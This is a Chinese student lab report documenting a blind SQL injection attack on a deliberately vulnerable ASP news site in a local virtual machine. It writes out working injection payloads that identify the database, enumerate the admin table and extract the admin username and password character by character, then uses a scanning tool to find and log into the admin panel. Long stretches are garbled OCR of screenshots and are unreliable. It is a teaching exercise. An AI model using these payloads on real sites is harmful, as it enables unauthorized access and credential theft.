SQL注入攻击实验报告x

实验报告

实验名称 ： SQL 注入攻击）

一、 实验目的

通过SQL注入攻击，掌握网站的工作机制，认识到SQL注入攻击的防范措施，加 强对Wet攻击的防范。

二、 实验环境

描述实验开展所基于的网络环境，给出网络拓扑、IP地址、web服务器、客户机 等信息。

宿主机（客户机）：操作系统为 Windows 10，IP为，在主机上安装虚拟化软件 Vmware Player，在此基础上创建虚拟机并安装操作系统，进行网络配置，采用环回 适配器，桥接模式，实现宿主机与虚拟机之间的网络通信，

虚拟机（Web服务器）：操作系统为 Windows XP, IP为，

本实验利用windows的iis 服务搭建了一个有SQL注入漏洞的网站“ ASP新 闻发布系统”，以该网站为目标，对其实施 SQL注入攻击。

本实验所需工具如下：

IIS 是 In ternet In formation Server 的缩写，是微软提供的 In ternet 服务

器软 件，包括Web FTP Mail等服务器，也是目前常用的服务器软件。版本不限。

“啊 D'注入工具：对“ MSSQL显错模式”、“ MSSQL不显错模式”、

“ Access ”等数 据库都有很好的注入检测能力，内集“跨库查询”、“注入点扫 描”、“管理入口检测”、 “目录查看”等等于一身的注入工具包。

“ ASP新闻发布系统” 0k3w源码。

三、 实验内容

（一）配置实验环境，

首先选择网络适配器，安装环回适配器，在主机上安装 VmwarePlayer，成功启

动虚拟机。接着配置宿主机和虚拟机的IP，如图

如鸭宓韵站M6,矗可咗取兰為詡鮒IP ￡&.逵删.你愛養从网 屯雋諭苗細也義晦电国酌pm

10 ?4出勺 I

子网?屮

要注意的是，配置主机上的IP时，应该选择VMnet8,并且注意勾取Bridge

甩豁身

甩豁身份验证共享

VMware Virtual Ethernet Adapter for VMnetB

5d^〔C}...

此连接便用下列環目Q】：

创Microsoft网角喜户M

^pVMware E ridgefrroto col

侧 丰训UlBUfl同雷』；紗4釉7印机共享

可j.穗路融5扑飆團应程序

叼 x Internet协议版本4仃匚P/1M4)

□ x Microsoft网晤适配器务菇传^器刃谀

词 铠踏剧5扑雄现玦卽器I/O驱动思序

Z?Microsoft LLDP确彊取动理囱

安装(N)十 卸議〔U)

然后，验证宿主机和虚拟机是否联通，结果显示连接成功。

licrosolt [|]J^-^. HX D. 105861

Cc) EiOlS fticrorolt CnTpnr讥inr.“嚟留虧，自枚#1 °

C:\V LHLUWS\sv3tem；iZ丹di^wi z;

C: \F IM1A.IS\3￥Ster?3Z>t]in￡ LyL. Itt. IS. _1

~rpPing 192,163. IS. 11具有32字节的滋据: 13Q.

~rp

Ping 192,163. IS. 11具有32字节的滋据: 13Q. L68Llfl.ll 192. L68； 13.11 的凰宴:

192.. Ifil Ifl. 11 的硬:

1BQ. L68L 13.11 的El复:

字节=22 时|'Bj<Lnis 尹在監时I乐1ms 孚节=翌B?间叽昭 宇T=32时间€Lms

TTL=12R

HL=123

T7L=12B

TTL-123

的2 lb8* 13.11

的2 lb8* 13.11尉Pina统计恒即：

数据包：已发送=4.已騒 =4.丢失 肚返苗屋的洁计时囚⑼$秒为单位)；

昙菲-Uns*脣甚=One,丰均-】ns

0 (ra丢失h

C; \fINDOVSK^eoSaMnc 19L lfi8.18. 9

手衣"冒I共百

手

衣"冒I

共百

Pins 192」矩18. 9具有32字节的数据:

192,168L 1S.9的冋真：字节=32吋 162. 16& 18.0 的

15Q. 163. L3.9 的

152. 153. ：3.9的回复；宇节弓迂flj

|B]= ir；-' |Ej<liri： |C<1IH9

TTL=128

TTL=12￡ TTL-：屈

TTL=123

192,16E. IS. 0 的 Ping 领计信息,：

数据赳：已发送二4,已接收二弘丢尖= 在返彳苯的估计时间似呈砂为学位):

畐坯二Oree,苣■弋=晁，辛內=Orc

C;\TimXj￥S\cvEtora33>

最后在虚拟机上安装IIS程序，打开浏览器，输入地址“”，检查网站搭建情况。

成功!

（二）寻找注入点

在宿主机上，打开网页id=95，可以正常打开页面。

O ? " - I32.16fl.149 in jj

刃衣弋同址诗4

，?才STF；^r+ ■ iT hURmbmyb 乓？

AEF宥工坟已痕轨佩E

新円帝无

冈幡窃宁同忻KfE |

|鬲牯富科|平

哥祠宾诅：詰內堀 阿培囲悴 囱矽 人和新目11畔轉 僻新可

进行注入测试，键入id=95 and仁1 ，返回页面不变

0 http^/191168,18^9/list^sp?id=9S^Cand^01=l

三HE

网站首页赫破冊1

刚帶安全网页討作

网姑远莒1

平百跚

耐賁讯 诂内啦I两皓和 冋詰鶴店I人删闻I业畀动态SMM4

键入id=95 and仁2，返回页面出错。

!屮jnv

!屮

*?* 4Rt*k

mirrjsiiwtM.i ?> iitiTRT

厂卿■制？

i码Fir胡己坤T磴.^.*HT-

irarCIknF^rtli：

.*4Hu|t10> t^iUin-

-ir幵?叮传■： w ^fen^r>

rntE in* 5K I? -内胡曲!■!?規-AZT Iff#

jpiT.” UCCiR

?*■? 'mTitt- a1

■ Z畀处

Kirrx-3?Ek IB 心* bv=n IMHvW Ffcipi?.>i7；和『?18曲1?出曲7 /IJm： K >3- fi

亠 ^Ki'i

MriiU^ 0 Ifiiim. IFT |Jd 0 相>n" fl测Mil馬妇 R IUfT■- iih-i- g』*加 DjHU 11 H JI.

Z J >r^r V D

? ￡y 电 a ■:*r Efc

因此，可确定该网站存在注入点。

判断数据库类型

用系统表的方法进行判断，分别键入

id=95 and (select coun t(*) from sysobjects)>0 id=95 and (select count(*) from msysobjects)>0

L勺 4- O 护丫倍网用于吉峙人知*胫工郢出.FX ：

护丫倍网用于吉峙人知

*胫工郢

出.FX ： ft JIT P*T4hl?{ ?J.EL^? JljH - IdOfl? 茶昨刖记天I t￡ ?.^ = ^r = i上込口玄取甘财悴" /list ?E?. % IB fi

JbullVb.O ftiUMt Hl 10. Q. WR84)JmUiKllA3r? (lUOrt. l-.lt flcclr) 7hrTt/4?.O Efijl ZT 5^far:/5:F 36 ET 2. L &L品；L V

-屈：

fXT /Lint 叫

”时目：

'■'I -tEL-.M'Q I ? WJ

-Mtt：

‘I ?点““ ￡1出却*

!- 汀计厂：a n严 二.T .八 T. T卜乍 m" |l 1 I

? T亠 C

u * 直鮭 SRy ^fi

o Z1 ｛匕冉捡氏L：K确 18诧' -JT

3无昱蛊7票文 x 匚无理5埔员

兀窪且氏W歹

ii凹讥间F；两◎吃侗色可;±舁千

.绝占kJ射诩"纳洁虫直°

H打牛L:;川一」一?十百,￥氐音巧勺祐=疽配*映的仍梅-

xrr馆股锹Ltn -内:i ibA SR^ -刃當股

TL：xri.i.r三日军上

0 http7/1 g) 6B.1 &4/I lsLa5p?id>9S9h20and%d：L, .=l* l : ^20coun: . _」1 no nd

|tZOs^ubjeLh) a , |

卜7

心 I {fc?3ifcX?Ltflrit+ ?计尊<1国Jflisf 圍 无诂丘示叼氏

.单击肌証泗?麻*iJWifb

-fjw 辭.I验iR、主面"展后直越与所护朗碍

呦歸颈：Q0 -内宗眼石王i翫E -⑹淋

Eni?rn?lt: IS 身科彈

換卢肯息->.■

?错Q土：

fl. :i y=-; L t J￡J D毗込也"￡u￡4"窕k;JUJM￡」M

":-n,aft J.t曹彌命I坯找丁爭戒「曽It晋湎■叩”吋?吐［口 诵走它丄芒存坠 ⑺住它的名月耙州吕是些止墨口

ALflK ?it>j IK 临 fj

Hnnik^ o 鼻諒亠叭 mr io n：苗伸刊1〕^phVekKvr^P as QOCML 1讼E 'hdtii) 逊0. 2^3. 22 弘ftri,筠3F- 36 SB

Z. K Hala^r L.O

?网自.；

Ji￡t /I i L E.

i ItH：!

羽I】心忆月咱.I再箔ze

-*轴却

H ■ ■： 3 1ST : ft 审站I

IB

两者返回均出错，可知是access数据库

猜测表名

一般网站后台的管理员都默认在表 admin中，我们先试一下，键入:

id=95 and (select coun t(*) from adm in)v>0

i旷諄口風帝冴丁 ..导 |7肝可虽汛 雄需 珀” | Q hnp/<192.168.

i旷諄口風帝冴丁 ..导 |7肝可虽汛 雄需 珀

Sit

幅;登亭主圧

幅;

登亭

主圧

返回页面正常，可知该网站后台数据库中存在着表名为 admin的表。

猜测字段名不同公司网站有不同的字段名， 但一般都有三个字段，分别记录ID

号、用户名和密码，常用的字段名为：id， username, password0

分别键入 id=95 and (select coun t(id) from adm in)v>0

id=95 and (select coun t(user name) from adm in)v>0

id=95 and (select coun t(password) from adm in)v>0

? http；Fig2_16BJ &g,li￡t.agp "已=9占％2Darid%2[X2E4ct%20ccii^^^^^0frQ<n%JDB<jrni 巧==，戈* ▼

丄却厂无養二了网5t+ ) <rt￡^ra?4^*> 鼾闫良T

丄却厂无養二了网

5t+ ) <rt￡^ra?4^*> 鼾闫良T 立殆主_比

宣呈

re :KBQtram%2Cadi $ 右〒

.班

kJ K O W

AErMffijr柿茶塢w“

三者返回均正常。

　可知，表 admin 中存在的三个字段：id，user name, password。

　注：“username”的截图损坏，但是返回正常，望教员通融。

猜测管理员用户名和密码

确定表 admin 中有几条记录，键入 id=95 and (select count(*) from

admi n)=1返回页面正常。

可知，表admin只有一条记录。

猜测用户名长度，键入 id=95 and (select len(username) from admin)=1 返 回出错，继续键入 id=95 and (select len(username) from admin)=2 返回出错，

继 续 测 试 3/4/5… ,

Ofrt

Ofrt卜ft620admdn)= 1_土

砖笊氓尸下和悴作：

-中三竝1脚■戒血2車M

”打开:-：'V 1“日主百，埜后査找与用需诘尉貝关瞬溺"

KHI RSiSr 50： 102 -內SJIF哥吾&衣-应 口停

kJ K O W

嶠『稠区拭布丟蚯沁B

融百贞 計曲讯 刚址安全I期山窗作 何帖込誉 平向设计 皿缰蜃岸 遢小剧站

直到返回页面正确。测试到5的时候，返回正常。可知，用户名长度为 5

猜测用户名内容，采用ASCII码分析法先猜测第1位，用二分法，键入id=95 and (select coun t(*) from admin where (asc(mid(username,1,1)))betwee n 30 and 125)<>0 返回正确，进一步缩小范围 between 70 and 100 ，between 85 and 100 ，

between 90 and 100 ，=97。

.' rd%20($elect%20cou&20^rom%20adnir%2Cwhereetc(mid[use<na=

讦4H

U K 0 W

抽闻复卅束魏讽?&

刚站首页

1新冈资讯

齡安全

网页制作

网站运莒

平面跻

刚给缩程1

1演示魁

可知第一个字符为a。

依此类推，猜测之后的每一位字符,

0 tll620CelectM20tnuntt")站lOftcwn%?如dmin%20wh* reCasdnitKuaem ame^^ZiN=100) ?

汪护I

汪护

I询托SIH：

1? iJ%20Wect%20a)unU*用20ho*n%2gdmln

1

? iJ%20Wect%20a)unU*用20ho*n%2gdmln咄

nei^(aM(nrtidCijwm dtne^3)J) -1 D9f) ■= ><)| 9 1

卜?

分 可护胡 1

”会弓九口 帐是1

辽n栓养

<J K 0 W

枯fTt闻崔甲工竝小丄

r

1珈帧讯

昭天全1

刚矚惟1

| 1*4站运曲

| ￥曲诳计

1厲络编程|

1渣示1斓

耐百丙 号阈资讯 內培安士 同丙阴作 帕运营平面设计 竜示酣

匕 d 丐2 0{sei ect%20cc u mt( ■) %20衍am 9QC'admiri]%2tDwh|refasc Cm Id (u sema me,4,+)]) = 10 S) < > 0 * *W

匕 d 丐2 0{sei ect%20cc u mt( ■) %20衍am 9QC'admiri]%2tDwh|

refasc Cm Id (u sema me,4,+)]) = 10 S) < > 0 * *

W 口 Ei国詢 1

I it珂籽粧

二金董也口 |巖E： 现

O KO VV

r

网站苔页

1龄迎于

1昭丙对作

平面诺卄1

1畸坊稈

沌示画拈

?評噺週常相乎轶T*

最后得到用户名为admin

4.猜测密码，同理：

id=95 and (select len( password) from adm in)=6

9 //19^16S J a J/l istasp? kl=95%2Qa nd%2O(5elect%ZQI

ln(pa $sw<j nd)%20frci m%20a drnin)=d

k佥▼

T^L匚士绘示两 I

|

BH-) x ? D W. m ” 二1 軒可 1*珀立抽?_酣一

网站首页新闻资讯

励络安全囲页制作网结运营丨平面谡计昭集程演示昭

所以密码为6位。

9 ;elect%20count(t)%20from%20admin%20where%20%2l(asc(mid(password/5/5))) = 53)<：>0|p_^ 庇□无法显示网

） L《计算机网路技术3课t 〔新闻塗讯—文章分类—我芳x

＞会员入口 咪号:注册I站內搜索:

＞会员入口 咪号:

注册

I站內搜索:

卜会员入口 帐号:二］［登录I注册站內搜索:

卜会员入口 帐号:

二］［登录I注册

站內搜索:

r

网站首页1

新闻资讯1

兩络安全

网页制作1

网站运营1

1平面设计

网络编程

演示网站

U KO W

ASP新闻发布茶统泌启

ASP新闻炭布系纸曲?&

T

网站首页1

新闻资讯1

网络安全1

网页制作

网站运营1

平面设计1

网络编程1

演示网玄

0 telect%20count(*)%20from%20admin%20where%20%^

|)(asc(m id(pas$word,4,4))) = 52)<>0|

导航C无法显示网

浒） C《计算机网增技术》课毛； 新闻资讯■文章分类■我扌x

? .elect%20count(*)%20from%20adm泊％2时恥％20%

b(asc(mid(pas$word;3;3))) = 51)<>0 卜

导航D无法显示网

I 1

＞会员入口 帐号;密码;注册I站内搜索;浒） 《计算机网珞技术》课1 D新闻资讯_文章分类■我

＞会员入口 帐号;

密码;

注册

I站内搜索;

kJ KO W

恥P新闻发布系统泌.6

网站首页

新闻资讯1

网络安全

网页制作

网站运营1

平面设计

网络编程

演示网站

?(elect%20counte)%20from%20admin%20where9620%3

Nasc( m 1 d (p-asswo rd, 2^2}))=50) <> d|

牙航0无法显丁网

《计算和网菇扌爻术》课'

D軒闻资讯_袁童分奨_耳匚

计）

卜合员入口帐号;厨;登录注册

卜合员入口

帐号;

厨;

登录

注册

I站内鹹

卜会员入口豐录注册I詁内攫素:

卜会员入口

豐录

注册

I詁内攫素:

恥F新闻按布系毓讥币

r

两站首页1新闻资讯

励络安全

刚页制作

囲站运营

平面设计1

囲络编程1

演示网站

0 ?lect%20count(!t)%20from%20admin%20where%2D%2}(asc(mid(passwrdJ1f1)))=49)<>0 {:

薪阖遥讯文直碌毎

匚朝+葺□网航郴溟i

U代0 W

临F新闻绘布系坊帆点

F

网站首页

新闻资讯

网络安全I

网页制作

网站运营

I平面设计

I网貉编程

演示网站

0 唱1 ect%20count(^)%20from%20admln%20where%20%20[ascfnnidfpasswordr^fi)))^^4)<>0

导航L-无法显示网

肝）D新豳饥却送我E?

肝）

卜会员入口帐号:蔭码:登录

卜会员入口

帐号:

蔭码:

登录

注册

詁內撰索:

F

网站百页

I新闻资讯I

博络安全

网页制作

刚站运营

I平面设计

I网络编程

演示网站

最终得到密码为6位：123456。

（七）寻找到后台管理窗口 打开“啊D'软件，点击进入“管理入口检测”选 项，点击“检测管理入口”，进行检测，

可弔连橫租日录应鬼' //IS? 1fiR 1R 9/i n*rA^:/经

可弔连橫租日录应鬼

' //IS? 1fiR 1R 9/i n*rA^:/

经http"阳2? 366. 16.9/1^;^

^ httu: ///.. Adnii>/LnlK. up

**hl:Lp:Z/T92- 1&9. IS.9/wiitLri/indiK up

网殆呦止 http; //192 166, 16.9/

柠涮删入口

如图：打开检测到的各网址，测试是否为管理入口

可知为管理入口，如图:

?ihif 竹2托馴阳」闻筍呻

■ D

卜 ■CLJHWE）?' 专？W2

（八）登陆后台 找到后台管理窗口，，用刚刚得到的用户 名和密码登陆，后台 登陆成功。

K t> - * ■

砸 胃TgVHPHTW 耐憎M脚CKIMQ 轟?r 簪 R 土

MKIhMMIt曲看&后台 冷皆氏醫頁i?|<<111章常上卩.匚?+匚：：!去耳”4"%1_尢

MKIhMMIt

曲看&后台 冷皆氏醫頁

i?|<<

111章常上卩.匚?+匚：：!去耳”4"%1_尢Et mu *世■ 一丄孙：箪

MB4i

U h N ? < 缢mur rb h 史缶章

H ■宿i

okh tJ i^E ■■

鳴屉:岂：

t>ti Ii/ab^- jri-jja. om/

KrfltKi

iku^J

■E

di — ri-

-flpWBBI

髯倉串：層 ue W 町 W^qsM t mn

H口伽巾沪#1 匚".[■■Tp^LpnzTl

?丄的丽1： X

CMETSf?*f|= K

种迈快阳4CTER；<

四、实验结果及分析

SQL注入攻击过程。

1） 判断Web环境是否可以SQL注入。如果URL仅是对网页的访问，不存在 SQL 注入问题， 如：就是普通的网页访问。

　只有对数据库进行动态查询的业务才可能存在 SQL注入，如：id=95，其中id = 95表示数据库查询变量，这种语句会在数据库中 执行，因此可能会给数据库带来威胁。

2） 寻找SQL注入点。完成上一步的片断后，就要寻找可利用的注入漏洞，通过 输入一 些特殊语句，可以根据浏览器返回信息，判断数据库类型，从而构建数据库 查询语句找到注入点。

3） 猜解用户名和密码。数据库中存放的表名、字段名都是有规律可言的。通过 构建特 殊数据库语句在数据库中依次查找表名、字段名、用户名和密码的长度，以 及内容。这个过程可以通过网上大量注入工具快速实现， 并借助破解网站轻易破译用 户密码。

4） 寻找WEB管理后台入口。通常 WEBB台管理的界面不面向普通用户开放，要 寻找 到后台的登陆路径，可以利用扫描工具快速搜索到可能的登陆地址，依次进行 尝试，就可以试出管理台的入口地址。

5） 入侵和破坏。成功登陆后台管理后，接下来就可以任意进行破坏行为，如篡 改网页、 上传木马、修改、泄漏用户信息等，并进一步入侵数据库服务器。

实验心得：

在实验的过程中遇到了很多困难， 配置上的， 环境上的， 还有一些需要注意的小 问题，而且从整个实验的过程来讲也涉及到了很多软件的配合使用。

在整个实验中遇到的最大问题就是， 宿主机和虚拟机此前一直连不通， 通过宿主 机 ping 虚拟机，一直无法连接。直到最后我把虚拟机的防火墙关闭了，宿主机才能 访问虚拟机上发布的网页。

　可见，防火墙还是有一定作用的， 但是对于网站来说开通 了防火墙就没办法访问网页了。